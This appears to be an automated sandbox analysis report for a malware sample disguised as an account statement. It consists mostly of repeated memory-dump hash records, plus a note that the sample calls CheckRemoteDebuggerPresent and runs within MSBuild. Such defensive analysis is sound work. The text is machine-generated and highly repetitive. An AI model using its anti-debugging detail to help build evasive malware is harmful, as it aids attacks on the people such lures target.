                                              • Opcode Fuzzy Hash: f88c503c5f12e6a95f85ecd62777f22d89ce2bb7ada8da4ceaffcd0ff745cd26
                                              • Instruction Fuzzy Hash: EBE1CD317416059FEB19EF79C464BAEBBF6AF89300F1484ADC245DB290DB35DA01CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a850c2f286680aa03949fa1e57bb52146908537abf16cae4dd925b408278e0b
                                              • Instruction ID: d37bf56a37afa2cf6036093fb3d0a48ed3f6b76f4c34c9c254d40171744b5513
                                              • Opcode Fuzzy Hash: 3a850c2f286680aa03949fa1e57bb52146908537abf16cae4dd925b408278e0b
                                              • Instruction Fuzzy Hash: 47E13974E042598FDB14DFA9D580AAEFBB2FF89300F248169D415AB356D730AD81CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 792cd40c575e38e4cb7b8e158835b372870c4f6fe435cf8aff2b1b60036a57f0
                                              • Instruction ID: 01ec9de50bfd5d3fc91b33444ce6c8318dbf0035cce5597af86f625322c68995
                                              • Opcode Fuzzy Hash: 792cd40c575e38e4cb7b8e158835b372870c4f6fe435cf8aff2b1b60036a57f0
                                              • Instruction Fuzzy Hash: 83E11C74E002599FDB14DFA8D580AAEFBB2FF88304F248169E515AB356D730AD41CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de212d4f22466d9b2864cc253253d5b934f401f13c11618ee9840dd9fe58dd9e
                                              • Instruction ID: 2641b8b73a1c27f05816a3b742a17e9dddb7c7f6e5dd6a0b60520acf995a1484
                                              • Opcode Fuzzy Hash: de212d4f22466d9b2864cc253253d5b934f401f13c11618ee9840dd9fe58dd9e
                                              • Instruction Fuzzy Hash: 1CE13B74E002599FDB14DFA9C580AAEFBB2FF89304F248169E405AB356D730AD81CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d5a6931b06b21065dc36d5d9057a90a120158f788339db9eb771827007394c0
                                              • Instruction ID: 573f5e02e69fc805e37fc4b839f356c211a7b5103362868609c62d5ec48e0eb8
                                              • Opcode Fuzzy Hash: 5d5a6931b06b21065dc36d5d9057a90a120158f788339db9eb771827007394c0
                                              • Instruction Fuzzy Hash: C9E11874E002598FDB14DFA9D580AAEFBB2FF88304F648169D415AB356D730AD81CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd4de1be1f02af6813cfdea86b3d8d5b104579294f7842c8a73faf42ea5373f8
                                              • Instruction ID: 5c95df8441334829a6c9a8650cca1b760b76e40975d1be5d414568d00ed65c60
                                              • Opcode Fuzzy Hash: bd4de1be1f02af6813cfdea86b3d8d5b104579294f7842c8a73faf42ea5373f8
                                              • Instruction Fuzzy Hash: 85E11B74E042598FDB14DFA8D580AAEFBB2FF88304F248169E515AB356D730AD41CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b91918835d034ca9912f12e0063c8ea796319e693d4b829073a3011c12b4eb5
                                              • Instruction ID: adec6e4d82007abffecd8e7115230e7396254153e314392ed2f19d659cc6b1f6
                                              • Opcode Fuzzy Hash: 3b91918835d034ca9912f12e0063c8ea796319e693d4b829073a3011c12b4eb5
                                              • Instruction Fuzzy Hash: 9FA16E32A0020A8FCF19DFB9D89059EBBB6FF84300B15456AE905EB265DB71DA55CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cb4f878a63ec80102eaf2cbadd96de219ab5408552ebea19585c64e35cd11ce
                                              • Instruction ID: 1424912796e27127a04685b8adeec369594d05ceaca8c8c1c262356ba3db3f49
                                              • Opcode Fuzzy Hash: 8cb4f878a63ec80102eaf2cbadd96de219ab5408552ebea19585c64e35cd11ce
                                              • Instruction Fuzzy Hash: F151B274E49209CFCB04DF9AD5849EEFBF6AF89310F1490A6E419B7211D7309A41CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 394fda043172e0974bea634d829ff52138c087e03fa6d7d76012db9853ffacab
                                              • Instruction ID: 2fbb093a6b2cc174fd3645cc5cbb0818c693ecb64c9f7fb0576a5adf0781249c
                                              • Opcode Fuzzy Hash: 394fda043172e0974bea634d829ff52138c087e03fa6d7d76012db9853ffacab
                                              • Instruction Fuzzy Hash: D8D05E20A8D2849BC7211BD8E00C4F8FBBADF4B025B0520E2D15EAB493C2614626868A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:10.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 27736 12670b0 27737 12670f4 CheckRemoteDebuggerPresent 27736->27737 27738 1267136 27737->27738
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5298d309c023a8025c1b92ceade6d0afdd18576bbecfbc897394c1e78088c203
                                              • Instruction ID: b677a489628bbfa21bdd6b4cd6514048dedddade6db52b72617e1bca5a408c1d
                                              • Opcode Fuzzy Hash: 5298d309c023a8025c1b92ceade6d0afdd18576bbecfbc897394c1e78088c203
                                              • Instruction Fuzzy Hash: 2863D631D10B5A8EDB51EF68C884A99F7B1FF99300F15D69AE44877121EB70AAC4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 724c68ebb0c37d8961649553e18e9e1db30efd7d20d711a1882e82441e196a0c
                                              • Instruction ID: 76d6acf0ce945831680488b545c817299b87e850d7dd37626df68c5ec74c5330
                                              • Opcode Fuzzy Hash: 724c68ebb0c37d8961649553e18e9e1db30efd7d20d711a1882e82441e196a0c
                                              • Instruction Fuzzy Hash: 8B330D31D1071ACEDB11EF68C8805ADF7B5FF99300F25C69AE458A7251EB70AAC5CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bc2df8b424e318b51bbc6541e8ffc3d4bbfb6716ea1c73065ce3d80c3067e78
                                              • Instruction ID: 3056e38bcdd12a5f6ee5efdd6eab02165ac991d38e8e68fa1ff60963d367a1b2
                                              • Opcode Fuzzy Hash: 3bc2df8b424e318b51bbc6541e8ffc3d4bbfb6716ea1c73065ce3d80c3067e78
                                              • Instruction Fuzzy Hash: 8123E631D10B5A8EDB51EF68C8806A9F7B1FF99310F15D69AE44877121EB70AAC4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1386 12670b0-1267134 CheckRemoteDebuggerPresent 1388 1267136-126713c 1386->1388 1389 126713d-1267178 1386->1389 1388->1389
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01267127
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2158641479.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1260000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: b0aaec27b79b5f814be686e6ade5acaabd76c91e939f314e139c1c5aefe5fe2c
                                              • Instruction ID: 83411119bb66199c7f4b942dd56ee7556953a283d4ca6f364ab674d21b4d4ee9
                                              • Opcode Fuzzy Hash: b0aaec27b79b5f814be686e6ade5acaabd76c91e939f314e139c1c5aefe5fe2c
                                              • Instruction Fuzzy Hash: 102137B1800259CFDB14CF9AD884BEEFBF4EF49324F14845AE559A3250D778A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f338b57b019d71d3f0b5d1307866bf23978ff7b6f0514bbf10714f4149a99e1
                                              • Instruction ID: 4e394b9554e2fc059d6685ebadb1c4f0250687e67faece63fde28628feefddd3
                                              • Opcode Fuzzy Hash: 6f338b57b019d71d3f0b5d1307866bf23978ff7b6f0514bbf10714f4149a99e1
                                              • Instruction Fuzzy Hash: 4B924734E00205CFEB64DB68C584A5DB7F6EB89314F6584AAD409EB7A1DB75EC81CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08afcdf7fa5ffb3db9b2e7a8b33ac3b5796f8b7123943d8c699e289fd4b2281c
                                              • Instruction ID: 9657c2ce7a2255bccd7f6f5b7249c28dbcf9983066d467c38e6b590096062bfe
                                              • Opcode Fuzzy Hash: 08afcdf7fa5ffb3db9b2e7a8b33ac3b5796f8b7123943d8c699e289fd4b2281c
                                              • Instruction Fuzzy Hash: 8F62AF34B102098FEB54DB68D594AADB7F6FF88314F248429E416DB796DB35EC81CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7423222cf3a97f6a63065de52e8f89916839895e9dc106f720f60536e29e059
                                              • Instruction ID: dacd1e010e2ed3a7f5f700b15cf53dc6d9d79a27a85eb2566f08a829edf1e6b9
                                              • Opcode Fuzzy Hash: e7423222cf3a97f6a63065de52e8f89916839895e9dc106f720f60536e29e059
                                              • Instruction Fuzzy Hash: 8C12F071F002159FEF64DBA4C99066EB7BAEB84364F208429E955DB781DB34EC42CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055a442f75ef090713b9b8004915a16c99ca3b316dd0223a183bc6e6939f1ab6
                                              • Instruction ID: 630828cb777b007da1a07a29f8581225a9d2ce5a13ad6a4895df3af76f713770
                                              • Opcode Fuzzy Hash: 055a442f75ef090713b9b8004915a16c99ca3b316dd0223a183bc6e6939f1ab6
                                              • Instruction Fuzzy Hash: FB226F70E1010A8FFFA4DB69D4907AEB7BAFB89310F308926E415D7785DA35DC818B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Graph of the function starting at 0x6906808 (calls to 0x6907021 / 0x6907028); basic-block edge list omitted
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb51cf05e8f9f9f709f49b9e999cd6d94d3c2b21363af3a35fc567c5ea22468e
                                              • Instruction ID: e757995328b7ec55baa20ebe56d74ee922370b9a8a716d39c76db41526ae6bae
                                              • Opcode Fuzzy Hash: eb51cf05e8f9f9f709f49b9e999cd6d94d3c2b21363af3a35fc567c5ea22468e
                                              • Instruction Fuzzy Hash: CD323031E1065ACFDB14EFB5C85059DB7B6BFD9300F20C6AAD50AA7254EB70AD81CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Graph of the function starting at 0x690b4f0 (calls to 0x6909d10); basic-block edge list omitted
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0f6ffcc6cb3ba829950ea7f831c52c562c1736dbd50109ccb8d62fb28c49e41
                                              • Instruction ID: a29950808d20078686193c1c6cb7a5957478cc8c2b0d79e7baf8e3e8c0ca107a
                                              • Opcode Fuzzy Hash: c0f6ffcc6cb3ba829950ea7f831c52c562c1736dbd50109ccb8d62fb28c49e41
                                              • Instruction Fuzzy Hash: 6A029030B0021A8FEB54DB69D494B6EB7E6FF88314F248528D416DB798DB31EC42CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Graph of the function starting at 0x12670a8 (calls CheckRemoteDebuggerPresent); basic-block edge list omitted
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01267127
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2158641479.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1260000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: 2335695ec551a10a2f35f1081289c1f0938e4aafd8eee3d05877bdf5c2af3cd2
                                              • Instruction ID: 19b71485fd0bfb1969eaf8bee7dde9bc355d4f4966f7eb2a688c17c235462812
                                              • Opcode Fuzzy Hash: 2335695ec551a10a2f35f1081289c1f0938e4aafd8eee3d05877bdf5c2af3cd2
                                              • Instruction Fuzzy Hash: 1121487180025ACFDB14CF9AD884BEEFBF4AF48324F24846AE455A3650C738A944CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c06c8b5459dd7ae9bf69f9a50a9f8e16d20211a55f8f55615eb491287ef6d62
                                              • Instruction ID: 85df1608e7883168cb9036d7734382510585bdbd878907336e0db0dc90732839
                                              • Opcode Fuzzy Hash: 6c06c8b5459dd7ae9bf69f9a50a9f8e16d20211a55f8f55615eb491287ef6d62
                                              • Instruction Fuzzy Hash: 0F029370E0020ACFEBB4DB68D4946ADB7BAFB49350F24892AD815DB781D770DD81CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Graph of the function starting at 0x690e440 (calls to 0x690e9a7 and 0x6909d10); basic-block edge list omitted
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d712c0351fec5b041b00a50d64f6926985da7ef938772983d9c08caf31dae0d
                                              • Instruction ID: 7e9e17e345163c5228897eeea6ad5383fd95bc6538c39090dca69a767934f2c8
                                              • Opcode Fuzzy Hash: 2d712c0351fec5b041b00a50d64f6926985da7ef938772983d9c08caf31dae0d
                                              • Instruction Fuzzy Hash: 30E18F30E1020A8FEF64DB69D4546AEB7B6FF88300F208929D516EB795EB70DC41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Graph of the function starting at 0x6907640 (calls to 0x6907640 / 0x6907904, 0x6907960 / 0x6907978, 0x6907df9, 0x6907f10 / 0x6907f00, 0x6908940 / 0x6908939, 0x6909558 / 0x6909548); basic-block edge list omitted
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33608e3baab1b8345c3685a84099a86139d6d26f7d58003f71aacdb49aae4a36
                                              • Instruction ID: e96e7dc297957ebd1d38abbc865b8a56c809c6e91b74b72902f64d6d8e86e0b0
                                              • Opcode Fuzzy Hash: 33608e3baab1b8345c3685a84099a86139d6d26f7d58003f71aacdb49aae4a36
                                              • Instruction Fuzzy Hash: C8917030B1024A8FEB54DBB9D4547AEB7B6EF85350F248429D40ADF385EB74EC428B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ced1a2e6382f053569a827c93745cd7608326ec4d1bea72de6e52d9a7e1e50d3
                                              • Instruction ID: cb13ef91c702f8f21e5870b97a65ea855feabf1b087209173ee2f7938e79e71c
                                              • Opcode Fuzzy Hash: ced1a2e6382f053569a827c93745cd7608326ec4d1bea72de6e52d9a7e1e50d3
                                              • Instruction Fuzzy Hash: A1915430B0065A9FEB54DB79D8507AE73B6FF85340F108569C419EB788EB709C45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d806154ddfc8da257413b525b746d74e609cfada9106f5d133bd69c667fe480c
                                              • Instruction ID: 0fce3ebf1885235cbc5862bf679b5b9a2cef8d17612b148b3e5730c32896bdc1
                                              • Opcode Fuzzy Hash: d806154ddfc8da257413b525b746d74e609cfada9106f5d133bd69c667fe480c
                                              • Instruction Fuzzy Hash: 7E61D172F001224FDF549A7EC88055FBADBAFC4220B244439E80EDB3A5DE65EC0287C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37c2b0fd29bffec226368d00314801f58f170d3c039b636ee6be66406295f214
                                              • Instruction ID: 76f842da1f67415badbac9a050716d31f1890513f30f425095a7407645b5ac64
                                              • Opcode Fuzzy Hash: 37c2b0fd29bffec226368d00314801f58f170d3c039b636ee6be66406295f214
                                              • Instruction Fuzzy Hash: F8914D30E1025A8FEF64DFA8C840B9DB7B1FF89314F208599D549AB291DB70AD85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0f067c06246ee488ba39855d0b9d9f5c61e36252d477e27862ccd8cfe5ac8a0
                                              • Instruction ID: af5297eea74d66703a7938435d9f69a7f6067dd8a14e9aa33aebe1e08dc32792
                                              • Opcode Fuzzy Hash: d0f067c06246ee488ba39855d0b9d9f5c61e36252d477e27862ccd8cfe5ac8a0
                                              • Instruction Fuzzy Hash: 0751F372F001224FDB11DA7EC88455FBADBAFC4220B25407AE80EDB361DEA5ED0287D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3da622443aa6e22d20cf2d76f96f98062252dd604975f9e13854bba6558b4cd
                                              • Instruction ID: 521d5df9c7993370419e025f7e8acba1ab65d8c1501c0cca20b4180ba617c58c
                                              • Opcode Fuzzy Hash: c3da622443aa6e22d20cf2d76f96f98062252dd604975f9e13854bba6558b4cd
                                              • Instruction Fuzzy Hash: E1912E30E1061A8FDF64DFA8C880B9DB7B1FF89314F208599D549AB385DB70A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15568295284adf2adf41e2c3efdbde2bba37ecd817d84869d943edd1a0263dca
                                              • Instruction ID: 7c1e046d587f8e6d4841b716ea1f6e0d222a84005aa8a23678cae0d342d42507
                                              • Opcode Fuzzy Hash: 15568295284adf2adf41e2c3efdbde2bba37ecd817d84869d943edd1a0263dca
                                              • Instruction Fuzzy Hash: 57619C70F002199FEF949BA5C8147AEBBF6FF88340F20842AE116EB395DB754C458B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 277710eebf0a038ec6bdf609e4ec18bde5295ada529d9d395dcd791a46847b1d
                                              • Instruction ID: 2e49917b36c4a562d31fbb834a2acaaa26f6939e134915901e7644af9c259f6f
                                              • Opcode Fuzzy Hash: 277710eebf0a038ec6bdf609e4ec18bde5295ada529d9d395dcd791a46847b1d
                                              • Instruction Fuzzy Hash: 26514130B0155A9FEB54DB78D8A0BAE73F6FF88640F148569C41ADB798EB70DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01c3f3667b352446874009c502da2eaa921abbf5914619e34c4f4462d676c6c3
                                              • Instruction ID: c7ca5191b8f5dc04a917f15feb159db2481429f6e60cf616b51a685a1a7b7f49
                                              • Opcode Fuzzy Hash: 01c3f3667b352446874009c502da2eaa921abbf5914619e34c4f4462d676c6c3
                                              • Instruction Fuzzy Hash: D9417531F006099FDF70CE99D9806AFF7BAFB85310F20492AD656D7680D730A9558B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0db5d5678ad4a9a2e5ecda7b40b94628eafd43a0ff12e6b0743da6d1802f098
                                              • Instruction ID: 3e646aefbf5a69825f64e97db2feef511dd65b8d6cab55ceb265a79995e6a0fc
                                              • Opcode Fuzzy Hash: f0db5d5678ad4a9a2e5ecda7b40b94628eafd43a0ff12e6b0743da6d1802f098
                                              • Instruction Fuzzy Hash: 9A418E70B102199FEB549BA5C814BAEBBF7FF88340F208529E116EB395DB749C05CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8433ee75c3fdb66c0a99bb7eac6abfabe1e7352910dc3d936811af70a9ce7ffb
                                              • Instruction ID: 1e80d96a7439be145e480823de9f3a3cdf9e08e07be51499085626885c784517
                                              • Opcode Fuzzy Hash: 8433ee75c3fdb66c0a99bb7eac6abfabe1e7352910dc3d936811af70a9ce7ffb
                                              • Instruction Fuzzy Hash: 4E31AF30B002068FEB58AB35C55466F7BA7AB89750F64486CD416DB385EE35CC41CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
